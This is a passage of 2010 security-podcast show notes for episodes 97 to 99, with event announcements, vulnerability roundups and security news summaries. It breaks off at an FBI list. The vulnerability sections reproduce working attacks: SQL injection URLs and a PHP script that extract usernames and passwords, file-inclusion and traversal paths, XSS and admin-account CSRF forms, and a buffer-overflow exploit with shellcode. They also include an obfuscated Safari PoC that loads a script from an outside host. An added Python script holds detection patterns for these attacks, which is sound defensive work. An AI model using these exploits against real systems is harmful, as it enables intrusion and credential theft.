Your daily source of Pwnage, Policy and Politics.

Episode 99 – Episode of “Do”


ISD Podcast Episode 99 for March 31, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • Washington DC – April 12th to 16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 for all classes. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Atlanta ISSA:
http://www.secureworldexpo.com/events/index.php?id=281

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. WordPress My Category Order Plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Versions less than 2.8 are affected. Exploit URL is available: http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
    2. AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability, allowing injection of malicious code in the context of the application. Versions less than 4.7.10 are affected. The targeted user must be logged in to the webmail application. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.
      <html>
      <head>
      </head>
      <body>
      <form method="post"
      action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"
      onSubmit="return false;">
      <input value="value"/>
      <input name="HistoryStorageObjectName" value="location;
      alert('xss'); //"/>
      </form>
      </body>
      </html>
      The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11
    3. DreamPoll is subject to Cross-Site Scripting and SQL Injection vulnerabilities. These vulnerabilities could be exploited to make unauthorized changes to a web site or to compromise a client accessing a site that uses the application. Versions less than 4.7.10 are affected. Example URLs are available: http://www.sample.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

      http://www.sample.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

    4. Docebo is subject to multiple SQL Injection vulnerabilities. Version 3.6.0.3 is affected. Google Dorks: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:"request.php" "deptid". Example URLs are available: http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

      http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

      http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

    5. Pepsi CMS (Irmin cms) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available: http://www.sample.com/PATH/index.php?w=[LFI%]

      http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

    6. Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    7. Peazip is subject to a division-by-zero attack resulting in a denial of service vulnerability. Version 3.0 is affected, though others may be as well. To trigger the vulnerability, open the application, click Tools, and enter a password / keyfile.

Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.

“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.

Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.

Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.

News item 2: http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.

These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.

Larry Ponemon, founder of the group that bears his name, said the survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.

Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of 11 million ($16 million) for organizations.

Episode 98 – Closer to a Century


ISD Podcast Episode 98 for March 30, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • Washington DC – April 12th to 16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 for all classes. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Simple Machines Forum Avatar is subject to a Remote PHP File vulnerability. This vulnerability allows an external PHP file to be executed against any visitor of the forum; the PHP file carries the malicious code, so the scope of the attack depends on what that file does. This impacts version 1.1.8, though others may be vulnerable as well. Proof of concept is available:
      <?php
      // Collects details about each visitor who loads this file as an "avatar"
      // and appends them to hacks.txt next to the script.
      $ip = $_SERVER['REMOTE_ADDR'];
      $so= $_SERVER['HTTP_USER_AGENT'];
      $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $url= $_SERVER['PHP_SELF'];
      $path= $_SERVER['DOCUMENT_ROOT'];
      $archivo = 'hacks.txt';
      $fp = fopen($archivo, "a");
      $string = "
      Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
      by Jose Luis Gongora Fernandez (aka) JosS

      $path$url

      VICTIM: $ip

      info: $so
      language: $lan

      ";
      $write = fputs($fp, $string);
      fclose($fp);
      ?>

    2. Joomla Component dcsFlashGames is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Version 2.0RC1 is impacted. Example URL is available: http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
    3. Joomla Component com_solution is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
    4. Joomla Component com_units is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    5. Joomla Component com_tariff is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
    6. Joomla Component com_agency is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
    7. Joomla Component com_adds is subject to a Blind SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--
    8. Joomla Component com_departments is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    9. Joomla Component com_business is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3--
    10. Joomla Component com_radio is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    11. Asp - comersus7F Shopping Cart Software is subject to a Backup Dump vulnerability. By default, comersus.mdb isn't password-protected, and contains the order information (buyer's address, phone, order status, tracking #, obs, etc.), settings (encryption password, admin email, company information, etc.) and shipment data. Exploit URL is available: http://www.sample.com/Comersus/database/comersus.mdb
    12. Powie's PSCRIPT Gästebuch is subject to a SQL Injection vulnerability. All versions earlier than 2.09 are impacted. Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2

Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.

A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 exploited by hackers over recent weeks. The latest version of Microsoft's browser, IE 8, is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.

The vulnerability involves a flaw in the iepeers.dll library involving the handling of invalid values passed to the "setAttribute()" function. Exploits create a means to drop malware onto the PCs of victims, provided they visit a booby-trapped website using a vulnerable version of IE.

News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.

Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.

Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.

News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.

Delivering the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.

Bratton, who also served as commissioner of the New York City Police Department, also said that computer security is an unmet challenge for police departments that is unlikely to be addressed in a significant way because of funding, prioritization, resources and access to systems.

He added that the situation is frustrating for police chiefs. "We know how to do it; we know how to coordinate it," he said. "It's a resource issue." Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.

News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.

Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.

“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”

Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this year's conference will play host to a hacking contest to see which cellphone is the most secure.

News item 5: http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI. The 25-year-old is said to have hacked into the micro-blogging website by simply guessing users' passwords.

The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.

Episode 97 – “Muffin Muncher”


ISD Podcast Episode 97 for March 29, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville, Indiana
  • (No URL for that as of yet)
  • Proceeds will be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Pc4Uploader is subject to a Local File Include (LFI) vulnerability. Versions 9.0 through 10.0 are impacted. Proof of Concept URL is available: http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
    2. AdaptCMS_Lite_1.5 is subject to a vulnerability that allows changing the admin user's credentials (username, password) and adding a new admin user. Version 1.5 2009-07-07 is impacted. Exploit code is available:
      <html>
      <head>
      </head>
      <body>
      <h2>coded by ahmadbady</h2>
      <form action='admin.php?view=edit_users2&id=1' method='post'>
      <table cellpadding='5' cellspacing='0' border='0' width='480'
      style='padding-left:5px' align='left'>
      <tr><td>Username</td><td><input type='text'
      name='username1' size='16'
      value='anything'
      style='font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px'>
      </td></tr><tr><td>New
      Password?</td><td><input type='text'
      name='password1' size='16'
      style='font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px'>
      </td></tr><tr><td>E-Mail</td><td><input type='text' name='email1'
      size='16' value='anything'
      style='font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px'>
      </td></tr><tr><td>Level</td><td><select name='level' style='font-family:
      tahoma;
      font-size: 11px; border: 1px solid #444444;padding-left:1px'><option
      value='Admin'
      selected>Admin - Level 1</option><option
      value='Member'>Member - Level
      3</option>
      <option value='Staff'>Staff - Level
      2</option></select></td></tr><tr><td>
      <input type='submit' value='Update User'
      style='font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px'>
      </td>
      </tr></table></form>
      </body>
      </html>
    3. 68kb is subject to multiple Remote File Include (RFI) vulnerabilities. Version 1.0.0rc2 is impacted. Example URLs are available:

      http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?

      http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?

    4. Netscape Navigator, Namoroka web browser and Flock browser are subject to a URL Code Execution vulnerability.  Version 9.0.0.6 of Netscape Navigator is impacted.  Exploit code is available:
      <html>
      <head>
      <title>firelinking By eidelweiss</title>

      <!-- Copyright (C) 2009-2010 firelinking by eidelweiss -->
      <!-- Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all
      my friends -->
      <!-- This PoC is cross platform : On Windows this example creates the
      file -->
      <!-- c:\mampus.bat and launches it (opens a dos box with a dir command).
      On -->
      <!-- Linux (tested Fedora Core) the example creates the file -->
      <!-- ~/mampus.txt Depending on caching the script might -->
      <!-- run twice in some cases (this will create an additional
      mampus-1.txt). -->

      <link rel="SHORTCUT ICON" href="favicon.ico">
      <script language="JavaScript"
      type="text/javascript">
      var pf = navigator.platform.toLowerCase();
      if (pf.indexOf("win") != -1) {
      var os = "win";
      } else if (pf.indexOf("linux") != -1) {
      var os = "linux";
      }
      function GoFuck() {
      // this is a bad caching workaround inside
      document.getElementById('outhtml').innerHTML = "";
      document.getElementById('outhtml').innerHTML +=
      document.getElementById('clearhtml').value
      document.getElementById('outhtml').innerHTML +=
      document.getElementById('clearhtml').value
      document.getElementById('outhtml').innerHTML +=
      document.getElementById('clearhtml').value
      window.setTimeout("document.getElementById('outhtml').innerHTML += document.getElementById('linkhtml_"+os+"').value",300);
      }
      </script>
      </head>
      <body>
      <div style="font-family:Verdana;font-size:11px;">

      <div
      style="font-family:Verdana;font-size:15px;font-weight:bold;">firelinking By eidelweiss</div>
      <br><br>
      <div style="width:600px">
      <div
      style="display:none"></div>

      <textarea style="display:none">
      <link rel="SHORTCUT ICON" href="favicon.ico">
      </textarea>

      <textarea id="linkhtml_win"
      style="display:none">
      <link rel="SHORTCUT ICON"
      href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
      file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
      file.initWithPath(\'c:\\\\mampus.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
      outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
      outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\';
      outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
      </textarea>

      <textarea
      style="display:none">
      <link rel="SHORTCUT ICON"
      href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
      file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
      file.initWithPath(\'~/mampus.txt\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
      outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
      outputStream.init(file,0x04|0x08|0x20,420,0);output=\'mampus!\';
      outputStream.write(output,output.length);outputStream.close();','','')">
      </textarea>
      <br><br>
      <a href="#">Run
      exploit</a>
      </div>
      </div>
      </body>
      </html>

    5. Apple Safari is subject to a history search vulnerability.  Code Execution Exploit PoC is available:
      <!--
      Copyright (C) 2009-2010 firelinking by eidelweiss
      Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
      Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
      This P0C made for Educational Purpose only
      Author Will Be not responsible For Any Damage.
      -->

      <html>
      <script>
      function Dick() {
      window.open('safari:historysearch?q=%2A"><img src=\'Dick\' Dickonerror=\'evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",6666);
      }
      </script>
      <body scrolling="no">
      <a href="#">Suck
      Please...</a>
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      &lt;<img src='Dick' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;
      </body>
      </html>

    6. Open Web Analytics is subject to multiple file include vulnerabilities.  Version 1.2.3 is impacted.  Code PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
    7. MyOWNspace is subject to multiple file include vulnerabilities.  Version 8.2 is impacted.  Example URLs are available: http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00

    8. DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability.  Version 2.2.5 is impacted.  Example URLs are available: http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]

      http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]

    9. Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability.  Version 3.1.0.8 is impacted.  Exploit code is available:
      # Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
      # Author: Hazem Mofeed
      # Download: http://www.mini-stream.net/mini-stream-ripper/download/
      # Home: http://hakxer.wordpress.com
      # (Python 2: str literals below are raw bytes)

      # [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] -> Exploited ..
      # http://www.exploit-db.com/exploits/11607
      shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
      "\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
      "\x63\x2e\x65\x78\x65\x00") # SP3(sh)

      # exploit
      exploit = ("\x41" * 43496 + "\x08\x6A\x83\x7C" +
      "\x08\x6A\x83\x7C" + shellcode )
      file = open("exploit.smi","w")
      file.write(exploit)
      file.close()

    10. SiteX CMS is subject to a SQL injection vulnerability.  Version 0.7.4 Beta is impacted.  Exploit code is available:
      <?php
      echo "\n\n###########################################################################\n";
      echo "####\n";
      echo "## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit ##\n";
      echo "## Usage: php.exe sitex.php www.site.com /cmspath/ ##\n";
      echo "## Require: Magic_quotes = off ##\n";
      echo "## Author: Sc0rpi0n [RUS] (http://scorpion.su) ##\n";
      echo "## Special for Antichat (forum.antichat.ru) ##\n";
      echo "## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:. ##\n";
      echo "####\n";
      echo "###########################################################################\n\n";
      $host=$argv[1];
      $path=$argv[2];
      $script="photo.php?albumid=";
      // payload for the albumid parameter, URL-encoded before it is sent
      $sql=urlencode("-1' UNION SELECT 1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM SiteX_Users WHERE -- ");
      $fsock=fsockopen($host,80);
      $headers="GET http://$host$path$script$sql HTTP/1.0\r\n";
      $headers.="Host: $host\r\n\r\n";
      fwrite($fsock,$headers);
      $response="";
      while(!feof($fsock))
      $response.=fread($fsock,1024);
      // the markers 0x3a3a / 0x3a3a3a / 0x3a3a3a3a delimit the two fields in the response
      $pos1=strpos($response,"::") or die("## http://$host is not vulnerable or error\n");
      $pos2=strpos($response,":::") or die("## http://$host is not vulnerable or error\n");
      $pos3=strpos($response,"::::") or die("## http://$host is not vulnerable or error\n");
      $len1=$pos2-$pos1;
      $len2=$pos3-$pos2;

      $login=substr($response,$pos1+2,$len1-2);
      $password=substr($response,$pos2+3,$len2-3);

      echo "## Host: $argv[1]\n";
      echo "## Login: $login\n";
      echo "## Password: $password\n";
      ?>
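
As an added example (not code from the podcast or from any of the advisories it summarises across these three episodes), here is a small Python log-review script that flags the request shapes seen in the example URLs above: numbered UNION SELECT columns, sleep()-based blind SQL injection, concat() credential dumps, ../ traversal with a trailing %00 null byte, remote URLs in include parameters, and the base64-wrapped SQL payload from the Docebo entry. The access-log lines it runs over are constructed for the example; their addresses and paths are made up.

```python
"""Log-review helper for the injection shapes listed in these show notes.
Added example: not code from the podcast or from any advisory it cites."""
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlparse

# Signatures distilled from the example URLs in the show notes; each regex is
# applied to a fully URL-decoded parameter value.
SIGNATURES = [
    ("sqli-union", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I)),
    ("sqli-time", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("sqli-concat", re.compile(r"\bconcat\s*\(", re.I)),
    ("sqli-arith-test", re.compile(r"\b(?:and|or)\s+\d+\s*-\s*\d+\s*=\s*\d+", re.I)),
    ("lfi-traversal", re.compile(r"(?:\.\./){2,}|\x00")),
    ("rfi-remote-include", re.compile(r"^(?:https?|ftp)://", re.I)),
]

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def maybe_base64_decode(value):
    """Return the decoded text if value is base64 wrapping printable ASCII,
    else None. The Docebo URLs carry their SQL payload this way."""
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/=]+", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify_value(value):
    """Set of signature labels that fire for one decoded parameter value,
    checking the base64-decoded form as well."""
    hits = {label for label, pat in SIGNATURES if pat.search(value)}
    decoded = maybe_base64_decode(value)
    if decoded is not None:
        inner = {label for label, pat in SIGNATURES if pat.search(decoded)}
        if inner:
            hits |= inner
            hits.add("base64-wrapped")
    return hits


def classify_request(path):
    """Sorted labels for one request path; parse_qsl URL-decodes each value,
    so '+' and '%00' become a space and a NUL byte before matching."""
    labels = set()
    for _, value in parse_qsl(urlparse(path).query, keep_blank_values=True):
        labels |= classify_value(value)
    return sorted(labels)


def scan_log(lines):
    """Return one finding per flagged request: ip, path and sorted labels."""
    findings = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        labels = classify_request(m.group("path"))
        if labels:
            findings.append({"ip": m.group("ip"), "path": m.group("path"), "labels": labels})
    return findings


# Constructed sample log: addresses from the RFC 5737 documentation ranges,
# paths modelled on the example URLs in the show notes. The first line is benign.
SAMPLE_LOG = [
    '203.0.113.9 - - [31/Mar/2010:10:15:22 -0400] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Mar/2010:10:15:40 -0400] "GET /index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- HTTP/1.1" 200 2210',
    '198.51.100.7 - - [31/Mar/2010:10:16:03 -0400] "GET /index.php?action=login&sortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20 HTTP/1.1" 200 1870',
    '198.51.100.7 - - [31/Mar/2010:10:16:31 -0400] "GET /docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g HTTP/1.1" 200 3304',
    '192.0.2.44 - - [31/Mar/2010:10:17:02 -0400] "GET /includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1492',
    '192.0.2.44 - - [31/Mar/2010:10:17:15 -0400] "GET /modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://203.0.113.77/shell.txt HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], ", ".join(f["labels"]), f["path"])
```

Point it at a real access log by replacing SAMPLE_LOG with the file's lines; the base64 check only fires when the decoded text itself matches a signature, so ordinary opaque tokens do not raise alerts.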

Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.

From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock "without holidays, weekends or vacations," according to Steven Chabinsky, deputy assistant director in the FBI's cyber division. "As a result, when an opportunity presents itself these criminals can start planning within hours."

According to the FBI the top 10 positions in cyber criminal organizations are:

